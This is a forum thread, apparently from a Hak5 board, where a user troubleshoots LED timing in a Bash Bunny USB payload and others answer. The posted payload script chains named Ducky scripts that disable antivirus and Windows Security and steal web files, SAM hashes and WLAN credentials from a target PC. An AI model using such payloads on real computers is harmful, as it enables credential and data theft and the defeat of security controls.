squish Posted March 4, 2017 Share Posted March 4, 2017 (edited) I'm using the bunny to execute multiple ducky scripts and I notice that the light is changing to green before the scripts have completed (I set the LED to green at the end of the payload script). Are the scripts somehow executing in async and is there a way I can make the bunny wait until the ducky scripts are complete before changing the LED? The payload script I'm using is below. I originally had all of the ducky scripts in one file but I broke them out in hopes that the LED would works as I expected. This is most likely user error but I figured I'd ask. #!/bin/bash # # Title: Get Info # Author: Tim with some help from ducktoolkit.com # Version: 1.0 # # Gets system info and files from the target computer. # Blink red while staging the attack. LED R 10 # Set the attack mode and source the helpers. ATTACKMODE HID STORAGE source bunny_helpers.sh # Set LED to blink white while running the attack. LED R G B 100 # Open Powershell. QUACK switch2/scripts/openps.txt # Disable Vipre and Windows Security. QUACK switch2/scripts/disablevipre.txt # Get Computer Info QUACK switch2/scripts/computer-info.txt # Steal Web Files QUACK switch2/scripts/steal-web.txt # Steal SAM and WLAN QUACK switch2/scripts/steal-files.txt # ZIP and Move the files QUACK switch2/scripts/zip-move.txt # Remove the folder created during execution of the attack. QUACK switch2/scripts/remove-dir.txt # Close Powershell #QUACK switch2/scripts/exitps.txt # Sync sync # Change the LED to green to show that the attack is complete. LED G Edited March 4, 2017 by squish Quote Link to comment Share on other sites More sharing options...
b0N3z Posted March 5, 2017 Share Posted March 5, 2017 Do you have to call for switch2 if your already on switch2 for the attack? Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted March 5, 2017 Share Posted March 5, 2017 2 hours ago, b0N3z said: Do you have to call for switch2 if your already on switch2 for the attack? QUACK runs from payloads/ so switch2/ is relative to that. When payloads execute both switch1 and switch2 are in the $PATH. This is going to change to something a lot more obvious in the next release. Squish - I advise copying the contents of those texts into the main payload.txt and trying it from that (obviously prefixing each ducky script command with "QUACK ") -- then we'll know if that's what's causing the LED to go off early. If that's the case, we'll need to tidy that up. Quote Link to comment Share on other sites More sharing options...
squish Posted March 6, 2017 Author Share Posted March 6, 2017 I tried running the scripts using QUACK in the bunny payload but the scripts won't run. I think the '$' in powershell is being interpreted by the bunny as something for bash. Is there a way to escape the dollar sign for use in the script (similar to using \\ to escape a \ in C#) ? They run fine from the text files with the exception of the bunny thinking the scripts are done before they are actually finished. Quote Link to comment Share on other sites More sharing options...
illwill Posted March 6, 2017 Share Posted March 6, 2017 (edited) Violation of CoC Edited October 8, 2017 by illwill Violation of CoC Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.